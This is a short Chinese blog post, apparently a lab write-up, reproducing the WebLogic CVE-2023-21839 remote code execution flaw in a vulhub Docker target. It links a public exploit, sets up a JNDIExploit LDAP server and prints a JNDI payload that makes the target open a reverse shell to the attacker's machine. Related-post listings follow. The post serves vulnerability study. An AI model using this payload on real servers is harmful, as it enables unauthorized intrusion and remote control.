Weblogic-CVE-2023-21839-远程代码执行复现

蔚落 2024-05-23 14:15 133阅读 0赞

Weblogic-CVE-2023-21839-远程代码执行复现

前言：

docker+vulhub
在这里插入图片描述
访问靶机：

漏洞验证：

exp：https://github.com/4ra1n/CVE-2023-21839
在这里插入图片描述
dnslog:

漏洞利用：——反弹shell到攻击机（kali）

JNDIExploit-1.2-SNAPSHOT.jar开启ldap:
在这里插入图片描述
发送反弹shellpayload：

ldap://172.16.1.100:1389/Basic/ReverseShell/ReverseShell/172.16.1.100/2233

成功反弹shell
在这里插入图片描述

发表评论取消回复

表情：

评论列表（有 0 条评论，133人围观）

还没有评论，来说两句吧...

相关阅读

相关 Weblogic-CVE-2023-21839-远程代码执行复现

Weblogic-CVE-2023-21839-远程代码执行复现

蔚落/ 2024年05月23日 14:15/ 0 赞/ 134 阅读

相关 [ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)

[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)WebLogic是美商Oracle的主要产品之一，系...

柔情只为你懂/ 2024年04月29日 00:31/ 0 赞/ 181 阅读

相关 Weblogic CVE-2018-3191远程代码命令执行漏洞复现

0x00 简介北京时间10月17日，Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-

╰+攻爆jí腚メ/ 2024年04月07日 10:57/ 0 赞/ 159 阅读

相关 Windows Shell远程执行代码漏洞(（CVE-2018-8414）复现

0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型，它的内容是XML格式进行编

忘是亡心i/ 2024年04月07日 10:56/ 0 赞/ 152 阅读

相关 ThinkPHP5 5.0.23远程代码执行漏洞复现

漏洞介绍 [ThinkPHP5][].0.23版本的漏洞：获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码

àì夳堔傛蜴生んèń/ 2023年10月04日 23:56/ 0 赞/ 95 阅读

相关 Apache SSI 远程命令执行漏洞复现

实验原理目标服务器开启了[ssi][]功能，且没有限制shtml文件上传，我们可以上传一个shtml文件，并利用语法执行任意

旧城等待，/ 2023年10月04日 21:35/ 0 赞/ 177 阅读

相关 CVE-2020-14882 WebLogic远程代码执行漏洞复现

Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一，其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用

川长思鸟来/ 2022年12月28日 11:08/ 0 赞/ 420 阅读

相关 php 远程代码执行漏洞复现 cve-2019-11043

漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞，使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞，可允许攻击者远程执行代码。向Ng

矫情吗；*/ 2021年09月03日 06:40/ 0 赞/ 872 阅读

相关 cve-2017-12617 tomcat远程代码执行漏洞复现测试

0x00前情提要 Apache Tomcat团队10月3日宣布，如果配置了默认servlet，则在9.0.1（Beta），8.5.23,8.0.47和7.0.82之前的所

柔情只为你懂/ 2021年09月02日 06:26/ 0 赞/ 891 阅读

相关 winrar远程代码执行漏洞复现(cve-2018-20250)

使用metasploit验证漏洞 1.漏洞影响 WinRAR < 5.70 Beta 1 Bandizip< = 6.2.0.0 好压(2345压缩) < = 5.

冷不防/ 2021年07月28日 23:30/ 0 赞/ 637 阅读